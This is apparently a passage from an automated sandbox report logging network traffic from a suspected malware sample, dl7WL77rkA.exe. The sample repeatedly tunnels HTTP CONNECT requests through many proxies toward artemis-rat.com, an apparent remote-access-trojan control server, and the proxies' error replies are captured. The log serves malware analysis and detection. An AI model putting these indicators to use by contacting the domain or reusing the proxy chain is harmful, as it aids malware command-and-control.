                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 5a 5a 59 5f 57 45 42 2f 32 30 2e 30 38 2e 31 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.174531937 CET719INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: ZZY_WEB/20.08.18
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:53:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 563
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 5a 5a 59 5f 57 45 42 2f 32 30 2e 30 38 2e 31 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:18.153526068 CET719INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: ZZY_WEB/20.08.18
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:53:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 563
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 5a 5a 59 5f 57 45 42 2f 32 30 2e 30 38 2e 31 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:24.105346918 CET719INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: ZZY_WEB/20.08.18
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:53:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 563
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 5a 5a 59 5f 57 45 42 2f 32 30 2e 30 38 2e 31 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1101192.168.2.552911103.113.71.23031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.198205948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.967607021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939420938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796786070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405452967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.014482975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.679776907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.904896975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1102192.168.2.552970118.27.33.1781183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.206578970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.245512962 CET132INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1103192.168.2.552389138.2.73.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.219557047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1104192.168.2.552890148.72.215.230486403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.219841003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.092361927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.201915979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405236959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.592715025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702217102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.905081034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1105192.168.2.551072167.86.69.142422143876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.229280949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389478922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.405390024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.499097109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1106192.168.2.553014104.19.235.10803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.236457109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.391025066 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1107192.168.2.552922210.72.11.4631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.246313095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.624404907 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1108192.168.2.552980146.19.106.217123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.253923893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1109192.168.2.552913139.99.148.9031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.254494905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.610845089 CET536INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: squid/3.5.20
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3711
